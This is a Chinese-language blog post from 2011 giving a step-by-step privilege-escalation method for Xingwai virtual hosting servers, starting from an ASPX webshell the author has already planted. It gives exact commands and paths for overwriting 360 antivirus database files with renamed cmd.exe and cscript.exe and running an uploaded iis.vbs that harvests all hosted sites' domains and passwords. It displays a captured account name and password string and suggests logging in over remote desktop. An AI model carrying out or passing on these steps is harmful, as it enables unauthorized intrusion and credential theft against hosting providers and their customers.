星外提权

星外提权方法

打开我们的aspx马 http://www.xxxxoooo.com/template/default/html/z.aspx

第一步 查找 c:\Program Files\360\360Safe\deepscan\Section\ 这个目录中的mutex.db 这个文件是360安全卫士的病毒库文件 我们要把这个文件替换成可执行的文件 打我们的 提权专用 文件夹 打开后,把cscript.exe命名为mutex.db 然后在把这文件上传到 c:\Program Files\360\360Safe\deepscan\Section\ 这个文件夹,上传后会替换mutex.db这个文件 上传替换成功

第二步 再次查找 c:\Program Files\360\360SD\deepscan\Section\ 这个目录中的mutex.db 和第一步一样 把cmd.exe命名为mutex.db 命名好以后上传 然后上传到 c:\Program Files\360\360SD\deepscan\Section\ 这个目录下,上传后会替换mutex.db这个文件 上传替换成功

第三步 还有一步没有做 要把 提权专用 文件中的iis.vbs上传到网站根目录下 好了,我上传好了

第四步 开始查看服务器上所有域名和密码 打开aspx马中的 cmdshell CmdPath:      输入cmd.exe替换的mutex.db的地址 Argument:      是输入命令的地方

命令是

/c "c:\Program Files\360\360Safe\deepscan\Section\mutex.db" d:\freehost\web\iis.vbs

上边的那句是命令方法 这个命令的意思就是 在c盘下执行 cscript.exe 使 iis.vbs能收集网站的所有域名和密码 d:\freehost\web\ 是咱们已经拿到webshell站的根目录

然后点确定

晕死,出错了

重试一下 丢大人了,上传目录问题 上边的命令改为 /c "c:\Program Files\360\360Safe\deepscan\Section\mutex.db" d:\freehost\damute\web\template\default\html\iis.vbs 这个命令,刚才是上传的地址没有弄在根目录下

下面我们开始 时间有些长,我们等着 出来了

我们把这些保存起来

查找星外受控端 找到了 这个就是用户名  freehostrunat 密码是:  991b95d33a17713068403079d4fe40a4!7 如果对方开了3389 我们就去登录吧

完成了。送我的哥们 酷帅王子 丢人了!!呵呵!

c:\Program Files\360\360Safe\deepscan\Section\mutex.db  cir c:\Program Files\360\360SD\deepscan\Section\mutex.db   cmd

 

d:\freehost\damute\web\

/c “c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe” d:\freehost\web\1.vbs

 

/c "c:\Program Files\360\360Safe\deepscan\Section\mutex.db" d:\freehost\damute\web\kkkkk.vbs

posted on 2011-11-13 02:25  0xcc  阅读(2176)  评论(0编辑  收藏  举报

导航